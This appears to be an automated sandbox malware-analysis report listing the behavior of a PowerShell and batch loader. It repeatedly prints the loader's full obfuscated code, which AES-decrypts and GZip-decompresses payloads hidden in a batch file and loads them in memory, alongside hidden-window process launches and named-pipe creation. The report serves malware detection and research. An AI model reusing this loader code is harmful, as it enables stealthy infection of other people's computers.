blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:gudwtndyxkts{param([outputtype([type])][parameter(position=0)][type[]]$eysutohjudxedh,[parameter(position=1)][type]$wayesupnic)$posiitcnxqz=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[char](100)+''+[char](68)+''+[char](101)+''+[char](108)+''+'e'+'g'+[char](97)+''+'t'+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+'n'+''+'m'+''+'e'+''+[char](109)+'o'+[char](114)+''+'y'+'m'+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+''+'e'+''+[char](108)+'e'+[char](103)+''+'a'+'t'+[char](101)+''+[char](84)+''+[char](121)+''+'p'+'e',''+[char](67)+''+[char](108)+''+[char](97)+'s'+[char](115)+''+[char](44)+''+'p'+''+'u'+''+[char](98)+''+[char](108)+'ic'+','+'s'+[char](101)+''+'a'+''+[char](108)+''+[char](101)+''+[char](100)+''+','+''+[char](65)+''+'n'+''+[char](115)+'i'+[char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+'o'+''+'c'+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$posiitcnxqz.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+[char](101)+'ci'+'a'+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+[char](101)+',h'+[char](105)+'d'+'e'+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+'g'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$eysutohjudxedh).setimplementationflags(''+[char](82)+'un'+[char](116)+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');$posiitcnxqz.definemethod(''+'i'+''+'n'+'v'+[char](111)+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+''+'d'+''+'e'+''+[char](66)+''+[char](121)+''+[char](83)+''+'i'+''+[char](103)+''+[char](44)+''+'n'+''+[char](101)+''+'w'+''+[char](83)+''+[char](108)+'o'+[char](116)+''+','+''+[char](86)+''+[char](105)+''+[char](114)+''+'t'+'u'+[char](97)+'l',$wayesupnic,$eysutohjudxedh).setimplementationflags(''+[char](82)+'u'+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+'a'+'n'+''+'a'+''+[char](103)+'e'+'d'+'');write-output $posiitcnxqz.createtype();}$cxukrbomemwqm=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+'ys'+'t'+''+[char](101)+''+'m'+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+[char](105)+'c'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t'+[char](46)+''+[char](87)+''+[char](105)+''+'n'+''+[char](51)+''+[char](50)+''+'.'+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 41_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 41_2_0000000140002300
Source: dwm.exe, 0000002D.00000000.2092393360.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002D.00000002.2639184711.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DEC2AF0 cpuid 20_3_000002527DEC2AF0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
